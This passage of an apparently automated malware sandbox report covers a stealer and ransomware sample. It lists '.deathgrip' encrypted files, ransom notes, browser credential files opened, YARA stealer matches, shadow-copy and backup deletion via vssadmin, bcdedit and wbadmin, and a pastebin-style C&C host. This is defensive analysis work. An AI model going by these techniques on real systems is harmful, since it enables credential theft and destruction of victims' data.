                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txt.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txt.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txt.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txt.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\times.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\times.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\xulstore.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\session-state.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\session-state.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\session-state.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.binJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\times.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\times.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release\startupCache\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\times.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release\read_it.txtJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected CStealer
                  Source: Yara matchFile source: 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mai.exe PID: 7740, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.jsonJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                  Yara detected Generic Python Stealer
                  Source: Yara matchFile source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mai.exe PID: 7740, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected CStealer
                  Source: Yara matchFile source: 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mai.exe PID: 7740, type: MEMORYSTR
                  Yara detected Generic Python Stealer
                  Source: Yara matchFile source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mai.exe PID: 7740, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4717264 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,4_2_00007FFBA4717264
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4715A70 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,Py_BuildValue,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PyList_GetItem,PyObject_CallOneArg,_Py_Dealloc,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,4_2_00007FFBA4715A70

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		31
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  Data Encrypted for Impact
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  Browser Extensions                  		11
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory4
                  File and Directory Discovery                  		Remote Desktop Protocol11
                  Browser Session Hijacking                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Bluetooth1
                  Inhibit System Recovery
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		21
                  Obfuscated Files or Information                  		Security Account Manager46
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Data from Local System                  		12
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron21
                  Registry Run Keys / Startup Folder                  		21
                  Registry Run Keys / Startup Folder                  		1
                  Software Packing                  		NTDS1
                  Query Registry                  		Distributed Component Object Model1
                  Clipboard Data                  		1
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets41
                  Security Software Discovery                  		SSHKeylogging2
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                  File Deletion                  		DCSync51
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                  Masquerading                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1504078 Sample: 4wx72yFLka.exe Startdate: 04/09/2024 Architecture: WINDOWS Score: 100 105 rentry.co 2->105 111 Malicious sample detected (through community Yara rule) 2->111 113 Multi AV Scanner detection for submitted file 2->113 115 Found ransom note / readme 2->115 119 11 other signatures 2->119 10 4wx72yFLka.exe 7 2->10         started        14 svchost.exe 2->14         started        16 wbengine.exe 2->16         started        18 6 other processes 2->18 signatures3 117 Connects to a pastebin service (likely for C&C) 105->117 process4 dnsIp5 103 C:\Users\user\Desktop\Mai.exe, PE32+ 10->103 dropped 147 Deletes shadow drive data (may be related to ransomware) 10->147 149 Writes many files with high entropy 10->149 21 main.exe 5 10->21         started        25 Mai.exe 151 10->25         started        151 Uses bcdedit to modify the Windows boot settings 14->151 153 Tries to harvest and steal browser information (history, passwords, etc) 14->153 27 cmd.exe 14->27         started        29 cmd.exe 14->29         started        31 cmd.exe 14->31         started        33 notepad.exe 14->33         started        155 Creates files inside the volume driver (system volume information) 16->155 107 127.0.0.1 unknown unknown 18->107 file6 signatures7 process8 file9 93 C:\Users\user\AppData\Roaming\svchost.exe, PE32 21->93 dropped 129 Deletes shadow drive data (may be related to ransomware) 21->129 131 Drops PE files with benign system names 21->131 35 svchost.exe 2 1002 21->35         started        95 C:\Users\user\AppData\Local\...\win32api.pyd, PE32+ 25->95 dropped 97 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->97 dropped 99 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 25->99 dropped 101 106 other files (none is malicious) 25->101 dropped 39 Mai.exe 25->39         started        133 May disable shadow drive data (uses vssadmin) 27->133 42 vssadmin.exe 27->42         started        44 conhost.exe 27->44         started        46 WMIC.exe 27->46         started        135 Uses bcdedit to modify the Windows boot settings 29->135 48 conhost.exe 29->48         started        50 bcdedit.exe 29->50         started        52 bcdedit.exe 29->52         started        137 Deletes the backup plan of Windows 31->137 54 2 other processes 31->54 signatures10 process11 dnsIp12 85 AppCache133409677868939833.txt.deathgrip, data 35->85 dropped 87 xIW3D5oXL8xIpGjHoi....br[1].js.deathgrip, data 35->87 dropped 89 wokAADULDNIRJUcpGm....br[1].js.deathgrip, data 35->89 dropped 91 42 other malicious files 35->91 dropped 121 Deletes shadow drive data (may be related to ransomware) 35->121 123 Overwrites Mozilla Firefox settings 35->123 125 Uses bcdedit to modify the Windows boot settings 35->125 127 6 other signatures 35->127 56 cmd.exe 35->56         started        59 cmd.exe 35->59         started        61 cmd.exe 35->61         started        63 notepad.exe 35->63         started        109 rentry.co 104.26.3.16, 443, 49705 CLOUDFLARENETUS United States 39->109 65 cmd.exe 39->65         started        file13 signatures14 process15 signatures16 67 conhost.exe 56->67         started        69 vssadmin.exe 56->69         started        71 WMIC.exe 56->71         started        73 conhost.exe 59->73         started        75 bcdedit.exe 59->75         started        77 bcdedit.exe 59->77         started        139 Deletes the backup plan of Windows 61->139 79 conhost.exe 61->79         started        81 wbadmin.exe 61->81         started        141 May disable shadow drive data (uses vssadmin) 65->141 143 Deletes shadow drive data (may be related to ransomware) 65->143 145 Uses bcdedit to modify the Windows boot settings 65->145 83 conhost.exe 65->83         started        process17

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  4wx72yFLka.exe63%ReversingLabsByteCode-MSIL.Trojan.CrealStealer
                  4wx72yFLka.exe51%VirustotalBrowse
                  4wx72yFLka.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD2.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD4.pyd0%ReversingLabs
